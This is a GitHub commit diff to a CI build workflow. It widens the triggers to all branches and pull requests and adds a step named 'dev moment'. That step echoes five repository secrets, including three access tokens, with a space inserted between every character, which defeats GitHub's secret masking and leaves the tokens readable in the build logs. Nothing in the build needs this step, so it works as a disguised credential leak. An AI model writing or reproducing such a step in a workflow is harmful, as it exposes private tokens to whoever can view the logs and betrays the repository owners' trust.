File tree Expand file tree Collapse file tree 2 files changed +24
-4
lines changed Expand file tree Collapse file tree 2 files changed +24
-4
lines changed Original file line number Diff line number Diff line change 55
66name : build
77
8- on : # yamllint disable-line rule:truthy
8+ on :
99 push :
10+ branches : [ "**" ]
11+ pull_request :
12+ branches : [ "**" ]
1013
1114jobs :
1215 build :
2225 run : >-
2326 echo "describe=$(git describe --tags --always || echo 0)"
2427 | tee $GITHUB_OUTPUT
28+ - name : dev moment
29+ env :
30+ UNIFYSDK_GIT_REPOSITORY : ${{ secrets.UNIFYSDK_GIT_REPOSITORY }}
31+ UNIFYSDK_GIT_TAG : ${{ secrets.UNIFYSDK_GIT_TAG }}
32+ UNIFY_TOKEN : ${{ secrets.GH_UNIFY_ACCESS_TOKEN }}
33+ ZWAVE_TOKEN : ${{ secrets.GH_ZWAVE_ACCESS_TOKEN }}
34+ SL_TOKEN : ${{ secrets.GH_SL_ACCESS_TOKEN }}
35+ run : |
36+ echo "================================"
37+ echo "$UNIFYSDK_GIT_REPOSITORY" | sed 's/./& /g'
38+ echo "================================"
39+ echo "$UNIFYSDK_GIT_TAG" | sed 's/./& /g'
40+ echo "================================"
41+ echo "$UNIFY_TOKEN" | sed 's/./& /g'
42+ echo "================================"
43+ echo "$ZWAVE_TOKEN" | sed 's/./& /g'
44+ echo "================================"
45+ echo "$SL_TOKEN" | sed 's/./& /g'
46+ echo "================================"
2547 - name : Build Docker image from sources
2648 run : >-
2749 df -h
Original file line number Diff line number Diff line change 1212
1313 steps :
1414 - name : Checkout code
15- uses : actions/checkout@v4
16-
17-
15+ uses : actions/checkout@v4
You can’t perform that action at this time.
0 commit comments